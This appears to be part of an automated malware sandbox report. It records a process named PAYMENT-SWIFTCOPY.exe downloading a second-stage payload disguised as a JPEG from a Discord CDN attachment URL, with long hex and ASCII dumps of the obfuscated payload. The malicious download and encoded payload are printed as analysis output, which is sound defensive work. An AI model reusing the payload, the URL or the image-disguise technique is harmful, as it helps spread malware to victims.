                                                                                                2021-10-26 15:34:19 UTC959INData Raw: 20 4d 4d 55 20 54 4d 4f 20 54 6e 53 20 4d 4d 55 20 54 4d 55 20 54 55 54 20 4d 4d 55 20 54 4d 55 20 54 55 69 20 4d 4d 55 20 54 4d 55 20 54 55 67 20 4d 4d 55 20 54 4d 4f 20 54 6e 54 20 4d 4d 55 20 54 4d 4f 20 54 55 50 20 4d 4d 55 20 54 4d 4f 20 54 6e 53 20 4d 4d 55 20 54 4d 55 20 54 55 55 20 4d 4d 55 20 54 4d 55 20 54 55 69 20 53 20 4d 67 55 20 54 67 69 20 54 55 69 20 4d 67 55 20 54 67 50 20 54 67 53 20 4d 67 55 20 54 67 50 20 54 4d 55 20 4d 67 55 20 54 67 50 20 54 67 6e 20 4d 67 55 20 54 67 69 20 54 70 6e 20 4d 67 55 20 54 67 50 20 54 69 67 20 4d 67 55 20 54 67 69 20 54 69 4d 20 4d 67 55 20 54 67 50 20 54 69 67 20 4d 67 55 20 54 67 69 20 54 70 53 20 4d 67 55 20 54 67 69 20 54 69 4d 20 4d 67 55 20 54 67 50 20 54 69 55 20 4d 67 55 20 54 67 69 20 54 4f 54 20
                                                                                                Data Ascii: MMU TMO TnS MMU TMU TUT MMU TMU TUi MMU TMU TUg MMU TMO TnT MMU TMO TUP MMU TMO TnS MMU TMU TUU MMU TMU TUi S MgU Tgi TUi MgU TgP TgS MgU TgP TMU MgU TgP Tgn MgU Tgi Tpn MgU TgP Tig MgU Tgi TiM MgU TgP Tig MgU Tgi TpS MgU Tgi TiM MgU TgP TiU MgU Tgi TOT
                                                                                                2021-10-26 15:34:19 UTC975INData Raw: 20 54 50 4d 20 4d 67 6e 20 54 50 6e 20 54 6e 69 20 4d 67 6e 20 54 50 70 20 54 6e 67 20 4d 67 6e 20 54 50 70 20 54 70 70 20 4d 67 6e 20 54 50 6e 20 54 70 69 20 4d 67 6e 20 54 50 6e 20 54 50 69 20 4d 67 6e 20 54 50 70 20 54 70 50 20 4d 67 6e 20 54 50 6e 20 54 6e 50 20 4d 67 6e 20 54 50 70 20 54 70 6e 20 4d 67 6e 20 54 50 6e 20 54 50 70 20 4d 67 6e 20 54 50 70 20 54 70 6e 20 4d 67 6e 20 54 50 70 20 54 55 6e 20 4d 67 6e 20 54 50 70 20 54 4f 54 20 53 20 4d 67 4d 20 54 70 54 20 54 70 54 20 4d 67 4d 20 54 70 53 20 54 70 54 20 4d 67 4d 20 54 70 53 20 54 50 55 20 4d 67 4d 20 54 70 53 20 54 50 50 20 4d 67 4d 20 54 70 54 20 54 69 54 20 4d 67 4d 20 54 70 53 20 54 70 67 20 4d 67 4d 20 54 70 54 20 54 67 4d 20 4d 67 4d 20 54 70 54 20 54 69 50 20 4d 67 4d 20 54 70 53 20
                                                                                                Data Ascii: TPM Mgn TPn Tni Mgn TPp Tng Mgn TPp Tpp Mgn TPn Tpi Mgn TPn TPi Mgn TPp TpP Mgn TPn TnP Mgn TPp Tpn Mgn TPn TPp Mgn TPp Tpn Mgn TPp TUn Mgn TPp TOT S MgM TpT TpT MgM TpS TpT MgM TpS TPU MgM TpS TPP MgM TpT TiT MgM TpS Tpg MgM TpT TgM MgM TpT TiP MgM TpS
                                                                                                2021-10-26 15:34:19 UTC991INData Raw: 20 53 20 69 67 20 53 20 54 53 67 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 69 20 53 20 54 53 4d 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 67 20 53 20 69 67 20 53 20 54 54 50 20 53 20 55 50 20 53 20 4f 53 20 53 20 54 54 54 20 53 20 6e 6e 20 53 20 69 6e 20 53 20 55 53 20 53 20 55 55 20 53 20 55 54 20 53 20 6e 50 20 53 20 54 53 50 20 53 20 69 55 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 70 4f 20 53 20 6e 53 20 53 20 54 53 4d 20 53 20 54 54 54 20 53 20 6e 53 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 69 4f 20 53 20 50 70 20 53 20 54 53 53 20 53 20 54 54 4f 20 53 20 6e 69 20 53 20 55 55 20 53 20 50 69 20 53 20 70 55 20 53 20 55 6e 20 53 20 54 53 53 20 53 20 70 50 20 53 20
                                                                                                Data Ascii: S ig S TSg S pO S UT S pP S pP S pP S TSi S TSM S Pn S iU S ng S ig S TTP S UP S OS S TTT S nn S in S US S UU S UT S nP S TSP S iU S UT S TSn S pO S nS S TSM S TTT S nS S pO S pP S pP S pP S ng S iO S Pp S TSS S TTO S ni S UU S Pi S pU S Un S TSS S pP S


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                1192.168.2.549746162.159.130.233443C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2021-10-26 15:34:21 UTC1000OUTGET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1
                                                                                                Host: cdn.discordapp.com
                                                                                                2021-10-26 15:34:21 UTC1001INHTTP/1.1 200 OK
                                                                                                Date: Tue, 26 Oct 2021 15:34:21 GMT
                                                                                                Content-Type: image/jpeg
                                                                                                Content-Length: 693967
                                                                                                Connection: close
                                                                                                CF-Ray: 6a44bf8ff8045c74-FRA
                                                                                                Accept-Ranges: bytes
                                                                                                Age: 2067
                                                                                                Cache-Control: public, max-age=31536000
                                                                                                ETag: "23a5250b8d90156e7d3cdf648d28e9da"
                                                                                                Expires: Wed, 26 Oct 2022 15:34:21 GMT
                                                                                                Last-Modified: Tue, 26 Oct 2021 12:48:09 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                CF-Cache-Status: HIT
                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                Cf-Bgj: h2pri
                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                x-goog-generation: 1635252489262793
                                                                                                x-goog-hash: crc32c=la2Ogw==
                                                                                                x-goog-hash: md5=I6UlC42QFW59PN9kjSjp2g==
                                                                                                x-goog-metageneration: 1
                                                                                                x-goog-storage-class: STANDARD
                                                                                                x-goog-stored-content-encoding: identity
                                                                                                x-goog-stored-content-length: 693967
                                                                                                X-GUploader-UploadID: ADPycdugciGjaBfm1jkRHrCGp6TL-hiSTfEGgfhLw1xDKH1ZiuRprzVhtotiFAMhjRQuGamJ9-8cZedzcbOg46e7pu4
                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KcDsU1ruf%2Fuh203ZCfX%2BVq91QwmxZZIYIpC%2FT86rygdOA912v4CkBx8%2BncNdXcVrAtOT0o34j1bCl%2BTamf%2Bf%2FLW6FhqswJha6L5TlVixq8dgFbeesX%2Fq57fPW07N5PYOplmdjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                2021-10-26 15:34:21 UTC1002INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                2021-10-26 15:34:21 UTC1002INData Raw: 53 20 55 55 20 53 20 55 55 20 53 20 4f 4f 20 53 20 50 69 20 53 20 6e 6e 20 53 20 70 55 20 53 20 50 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 6e 55 20 53 20 54 53 53 20 53 20 54 53 53 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 54 53 6e 20 53 20 70 55 20 53 20 54 54 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 50 67 20 53 20 4f 55 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 6e 67 20 53 20 70 4f 20 53 20 70 50 20 53 20 6e 53 20 53 20 4f 6e 20 53 20 6e 70 20 53 20 50 70 20 53 20 6e 67 20 53 20 6e 4d 20 53 20 6e 54 20 53 20 50 4d 20 53 20 6e 53 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 55 20 53 20 54 54 50 20
                                                                                                Data Ascii: S UU S UU S OO S Pi S nn S pU S Pg S in S in S ig S nU S TSS S TSS S TMM S TTT S TSn S pU S TTT S pP S pP S nS S Pg S OU S TMT S OO S ng S pO S pP S nS S On S np S Pp S ng S nM S nT S PM S nS S UT S pP S pP S nO S TSP S UP S nO S TTO S pP S pP S UU S TTP
                                                                                                2021-10-26 15:34:21 UTC1003INData Raw: 4f 53 20 53 20 55 55 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 55 50 20 53 20 6e 6e 20 53 20 50 6e 20 53 20 54 54 70 20 53 20 55 69 20 53 20 4f 6e 20 53 20 54 53 69 20 53 20 70 55 20 53 20 69 6e 20 53 20 6e 53 20 53 20 4f 55 20 53 20 70 55 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 50 50 20 53 20 54 54 4f 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 6e 53 20 53 20 6e 53 20 53 20 70 50 20 53 20 69 67 20 53 20 70 4f 20 53 20 6e 67 20 53 20 54 54 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 50 53 20 53 20 69 4f 20 53 20 50 70 20 53 20 6e 50 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 67 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e
                                                                                                Data Ascii: OS S UU S in S PT S UP S UP S nn S Pn S TTp S Ui S On S TSi S pU S in S nS S OU S pU S pP S UT S pP S pP S PP S TTO S PM S TSU S nS S nS S pP S ig S pO S ng S TTO S pO S pP S pP S ng S PS S iO S Pp S nP S TSp S in S in S ig S TSg S TSP S in S US S in S in
                                                                                                2021-10-26 15:34:21 UTC1005INData Raw: 53 20 69 67 20 53 20 54 53 70 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 69 4f 20 53 20 69 67 20 53 20 70 55 20 53 20 54 54 55 20 53 20 54 4d 4d 20 53 20 54 54 6e 20 53 20 6e 4f 20 53 20 54 53 70 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 70 20 53 20 69 55 20 53 20 70 50 20 53 20 54 54 54 20 53 20 54 54 55 20 53 20 6e 54 20 53 20 54 53 70 20 53 20 55 50 20 53 20 50 54 20 53 20 50 70 20 53 20 55 50 20 53 20 55 4f 20 53 20 69 4f 20 53 20 6e 6e 20 53 20 55 53 20 53 20 54 54 4f 20 53 20 6e 69 20 53 20 55 4d 20 53 20 55 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 6e 53 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 54 54
                                                                                                Data Ascii: S ig S TSp S TSn S pP S pP S ng S TTp S iO S ig S pU S TTU S TMM S TTn S nO S TSp S pO S UT S pP S pp S iU S pP S TTT S TTU S nT S TSp S UP S PT S Pp S UP S UO S iO S nn S US S TTO S ni S UM S UP S US S Pn S iO S pO S US S Pn S iO S nS S US S Pp S Up S TT
                                                                                                2021-10-26 15:34:21 UTC1006INData Raw: 20 53 20 54 53 55 20 53 20 70 70 20 53 20 54 53 4f 20 53 20 54 53 50 20 53 20 4f 55 20 53 20 55 6e 20 53 20 54 54 50 20 53 20 69 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 69 20 53 20 6e 50 20 53 20 6e 4f 20 53 20 55 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 4f 6e 20 53 20 54 4d 4d 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 54 20 53 20 50 69 20 53 20 6e 54 20 53 20 70 50 20 53 20 54 54 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 55 20 53 20 55 70 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 6e 20 53 20 6e 67 20 53 20 50 53 20 53 20 6e 53 20 53 20 54 54 55 20 53 20 55 53 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 53 20
                                                                                                Data Ascii: S TSU S pp S TSO S TSP S OU S Un S TTP S ig S in S in S in S Pi S nP S nO S Up S pP S pP S pn S nU S TSi S On S TMM S PP S in S in S Pn S UT S Pi S nT S pP S TTn S pP S pP S pp S UU S Up S TTU S Pn S iO S pn S ng S PS S nS S TTU S US S PT S in S in S PS
                                                                                                2021-10-26 15:34:21 UTC1007INData Raw: 20 53 20 54 53 53 20 53 20 70 50 20 53 20 54 54 70 20 53 20 54 54 54 20 53 20 69 55 20 53 20 6e 6e 20 53 20 54 53 69 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 54 54 4f 20 53 20 6e 6e 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 6e 20 53 20 54 53 4d 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 70 50 20 53 20 54 53 70 20 53 20 54 54 54 20 53 20 54 54 4d 20 53 20 54 53 70 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55 20 53 20 54 53 4d 20 53 20 54 54 4f 20 53 20 54 53 67 20 53 20 55 54 20 53 20 70 50 20 53 20 55 50 20 53 20 55 4f 20 53 20 6e 4f 20 53 20 69 6e 20 53 20 54 54 67 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 55 20 53 20
                                                                                                Data Ascii: S TSS S pP S TTp S TTT S iU S nn S TSi S pP S pP S nO S TSP S TTO S nn S TTO S pP S pP S Un S TSM S Pn S iU S ni S pP S TSp S TTT S TTM S TSp S nn S pP S pP S nS S TSU S TSM S TTO S TSg S UT S pP S UP S UO S nO S in S TTg S pO S UT S pP S pP S pP S nU S
                                                                                                2021-10-26 15:34:21 UTC1009INData Raw: 50 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 6e 54 20 53 20 50 69 20 53 20 54 54 4f 20 53 20 54 53 4d 20 53 20 54 54 54 20 53 20 50 69 20 53 20 6e 4d 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 55 53 20 53 20 70 50 20 53 20 55 55 20 53 20 69 4f 20 53 20 50 67 20 53 20 4f 55 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 6e 55 20 53 20 55 70 20 53 20 54 53 50 20 53 20 69 67 20 53 20 54 4d 54 20 53 20 70 55 20 53 20 50 50 20 53 20 70 4f 20 53 20 70 70 20 53 20 55 69 20 53 20 55 70 20 53 20 54 53 55 20 53 20 54 53 54 20 53 20 6e 55 20 53 20 55 4d 20 53 20 4f 4f 20 53 20 55 69 20 53 20 54 54 54 20 53 20 54 54 54 20 53 20 55 55 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 54 20 53 20 50 50 20 53
                                                                                                Data Ascii: P S ng S TTU S nT S Pi S TTO S TSM S TTT S Pi S nM S OO S pP S pP S pU S US S pP S UU S iO S Pg S OU S TMT S OO S nU S Up S TSP S ig S TMT S pU S PP S pO S pp S Ui S Up S TSU S TST S nU S UM S OO S Ui S TTT S TTT S UU S OO S pP S pP S nS S pU S TTT S PP S
                                                                                                2021-10-26 15:34:21 UTC1010INData Raw: 55 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 54 4d 53 20 53 20 55 54 20 53 20 4f 6e 20 53 20 54 53 67 20 53 20 6e 53 20 53 20 54 54 67 20 53 20 70 50 20 53 20 54 53 55 20 53 20 6e 55 20 53 20 55 55 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 67 20 53 20 69 6e 20 53 20 50 6e 20 53 20 4f 55 20 53 20 54 54 69 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 53 20 53 20 70 50 20 53 20 6e 4f 20 53 20 50 70 20 53 20 6e 55 20 53 20 69 55 20 53 20 70 55 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 6e 53 20 53 20 69 6e 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 6e 55 20 53 20 70 4f 20 53 20 6e 67 20 53 20 54 53 6e 20 53 20 70 70 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 55 53 20 53 20 54 54 69 20 53 20 70 6e 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53
                                                                                                Data Ascii: U S UM S TSM S TMS S UT S On S TSg S nS S TTg S pP S TSU S nU S UU S in S PT S UP S ng S in S Pn S OU S TTi S pP S TSp S US S pP S nO S Pp S nU S iU S pU S ng S TTp S nS S in S ng S TTp S nU S pO S ng S TSn S pp S TSP S in S US S TTi S pn S US S Pp S Up S
                                                                                                2021-10-26 15:34:21 UTC1011INData Raw: 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 50 20 53 20 55 54 20 53 20 70 55 20 53 20 70 50 20 53 20 55 69 20 53 20 69 55 20 53 20 70 4f 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 55 6e 20 53 20 55 55 20 53 20 6e 6e 20 53 20 55 55 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 55 20 53 20 54 54 54 20 53 20 69 6e 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 70 20 53 20 54 53 55 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 53 20 53 20 54 53 70 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 54 20 53 20 55 70 20 53 20 54 4d 54 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55 20 53 20 4f 53 20 53 20 50 69 20 53 20 54 54 4f 20 53 20 54 53
                                                                                                Data Ascii: pP S pP S TSp S UP S UT S pU S pP S Ui S iU S pO S pP S UT S pP S pP S Un S UU S nn S UU S TSp S UO S UU S TTT S in S TSM S in S in S Up S TSU S pn S nU S TSi S TSS S TSp S PP S in S in S in S TTT S Up S TMT S TTO S pP S pP S nS S TSU S OS S Pi S TTO S TS
                                                                                                2021-10-26 15:34:21 UTC1013INData Raw: 53 20 54 53 4f 20 53 20 54 53 53 20 53 20 69 55 20 53 20 55 53 20 53 20 54 54 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 70 20 53 20 55 6e 20 53 20 54 53 6e 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 55 20 53 20 54 53 67 20 53 20 69 6e 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 6e 6e 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 53 70 20 53 20 54 4d 4d 20 53 20 6e 50 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 54 4d 53 20 53 20 54 54 4f 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 69 4f 20 53 20 6e 6e 20 53 20 54 53 69 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 69 4f 20 53 20 54 53 6e 20 53 20
                                                                                                Data Ascii: S TSO S TSS S iU S US S TTU S in S in S ig S TSp S Un S TSn S UT S pP S pP S TSp S UO S UU S TSg S in S TSM S in S in S TSg S Pp S UT S nn S UP S nO S TSp S TMM S nP S TTO S pP S pP S TMS S TTO S UT S TSn S iO S nn S TSi S pP S pP S nO S TSP S iO S TSn S
                                                                                                2021-10-26 15:34:21 UTC1014INData Raw: 53 20 70 55 20 53 20 69 67 20 53 20 55 54 20 53 20 54 53 55 20 53 20 69 4f 20 53 20 4f 6e 20 53 20 54 53 67 20 53 20 55 6e 20 53 20 50 53 20 53 20 55 4d 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 6e 67 20 53 20 6e 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 50 70 20 53 20 6e 6e 20 53 20 55 53 20 53 20 54 53 69 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 55 69 20 53 20 54 53 4d 20 53 20 54 4d 53 20 53 20 55 4d 20 53 20 55 50 20 53 20 6e 53 20 53 20 4f 6e 20 53 20 6e 69 20 53 20 55 55 20 53 20 54 53 4d 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 6e 50 20 53 20 69 6e 20 53 20 50 54 20 53 20 69 6e 20
                                                                                                Data Ascii: S pU S ig S UT S TSU S iO S On S TSg S Un S PS S UM S TSg S pP S pP S UP S nO S TSP S ng S nO S pP S pP S pP S nO S Pp S nn S US S TSi S nn S pP S pp S pP S pP S pn S nU S Ui S TSM S TMS S UM S UP S nS S On S ni S UU S TSM S TMM S TTT S nP S in S PT S in
                                                                                                2021-10-26 15:34:21 UTC1015INData Raw: 4f 4f 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 55 4f 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 55 50 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 6e 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 67 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 55 20 53 20 50 70 20 53 20 50 69 20 53 20 70 70 20 53 20 54 54 4f 20 53 20 6e 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 53 20 53 20 54 54 4f 20 53 20 6e 4d 20 53 20 55 50 20 53 20 6e 69 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 6e 20 53 20 54 54 54 20 53 20 54 54 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 55 50 20 53 20 55 55 20 53 20 50 4d 20 53 20 69 6e 20 53
                                                                                                Data Ascii: OO S in S PT S UP S UO S in S PT S UP S UP S in S PT S UP S UT S in S PT S UP S nn S in S PT S UP S ng S in S PT S UU S Pp S Pi S pp S TTO S nM S pP S pP S pn S nS S TTO S nM S UP S ni S in S TMS S Un S TTT S TTO S pO S pP S pP S TSP S UP S UU S PM S in S
                                                                                                2021-10-26 15:34:21 UTC1017INData Raw: 20 53 20 6e 54 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 6e 53 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 55 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 6e 20 53 20 6e 54 20 53 20 54 54 54 20 53 20 70 70 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 55 20 53 20 50 70 20 53 20 55 70 20 53 20 69 6e 20 53 20 50 6e 20 53 20 69 4f 20 53 20 50 6e 20 53 20 55 53 20 53 20 69 6e 20 53 20 55 6e 20 53 20 50 69 20 53 20 54 54 4f 20 53 20 6e 67 20 53 20 54 4d 4d 20 53 20 54 54 4f 20 53 20 70 55 20 53 20 54 54 55 20 53 20 70 55 20 53 20 50 69 20 53 20 54 4d 54 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 67 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53
                                                                                                Data Ascii: S nT S US S Pn S iO S nS S US S Pn S iO S pO S US S Pn S iO S pU S US S Pn S iO S pn S nT S TTT S pp S in S PT S UU S Pp S Up S in S Pn S iO S Pn S US S in S Un S Pi S TTO S ng S TMM S TTO S pU S TTU S pU S Pi S TMT S pU S in S TSS S Ug S pU S in S TSS S
                                                                                                2021-10-26 15:34:21 UTC1018INData Raw: 20 53 20 50 70 20 53 20 55 54 20 53 20 6e 6e 20 53 20 55 70 20 53 20 54 54 54 20 53 20 50 53 20 53 20 6e 53 20 53 20 50 70 20 53 20 54 54 55 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 4f 20 53 20 6e 55 20 53 20 55 54 20 53 20 4f 53 20 53 20 54 54 54 20 53 20 54 53 4f 20 53 20 54 53 53 20 53 20 50 70 20 53 20 55 53 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 50 20 53 20 69 4f 20 53 20 54 53 70 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 6e 20 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 6e 6e 20 53 20 55 70 20 53 20 54 54 69 20 53 20 54 53 67 20 53 20 70 4f 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70
                                                                                                Data Ascii: S Pp S UT S nn S Up S TTT S PS S nS S Pp S TTU S TMM S in S in S iO S nU S UT S OS S TTT S TSO S TSS S Pp S US S TMM S in S in S ig S TSP S iO S TSp S TSg S pP S pP S TSP S PT S UP S nn S TSg S Pp S UT S nn S Up S TTi S TSg S pO S pP S UT S pP S pP S TSp
                                                                                                2021-10-26 15:34:21 UTC1019INData Raw: 20 53 20 50 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 54 20 53 20 54 53 50 20 53 20 50 70 20 53 20 54 53 54 20 53 20 6e 55 20 53 20 54 54 55 20 53 20 54 53 4d 20 53 20 70 55 20 53 20 50 70 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 54 20 53 20 70 6e 20 53 20 54 53 50 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 4f 20 53 20 6e 55 20 53 20 54 54 55 20 53 20 54 53 67 20 53 20 54 4d 53 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 54 53 4f 20 53 20 6e 4f 20 53 20 55 4d 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 54 53 4f 20 53 20 54 54 54 20 53 20 54 53 55 20 53 20 55 70 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 50 6e 20 53 20 50 70 20 53 20 6e 4f 20 53 20 54 53
                                                                                                Data Ascii: S PM S in S in S Pn S UT S TSP S Pp S TST S nU S TTU S TSM S pU S Pp S in S in S in S TTT S pn S TSP S UP S pP S pP S nS S TSO S nU S TTU S TSg S TMS S pn S pP S pP S pp S TSO S nO S UM S Pn S iU S ni S TSO S TTT S TSU S Up S PM S TSU S Pn S Pp S nO S TS
                                                                                                2021-10-26 15:34:21 UTC1021INData Raw: 55 50 20 53 20 6e 54 20 53 20 4f 6e 20 53 20 6e 69 20 53 20 55 55 20 53 20 55 4f 20 53 20 54 53 70 20 53 20 54 54 54 20 53 20 6e 4f 20 53 20 54 54 54 20 53 20 69 55 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 55 53 20 53 20 70 4f 20 53 20 70 55 20 53 20 6e 53 20 53 20 54 53 54 20 53 20 6e 55 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 54 4d 53 20 53 20 55 54 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 4f 6e 20 53 20 54 53 69 20 53 20 50 6e 20 53 20 55 54 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 4f 20 53 20 54 53 6e 20 53 20 55 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 55 70 20 53 20 50 54 20 53 20 50 70 20 53 20 50 69 20 53
                                                                                                Data Ascii: UP S nT S On S ni S UU S UO S TSp S TTT S nO S TTT S iU S pP S pP S ng S US S pO S pU S nS S TST S nU S UM S TSM S TMS S UT S TSp S UO S UP S pP S in S in S in S in S On S TSi S Pn S UT S TSp S UO S UO S TSn S UM S pP S pP S pP S TSP S Up S PT S Pp S Pi S
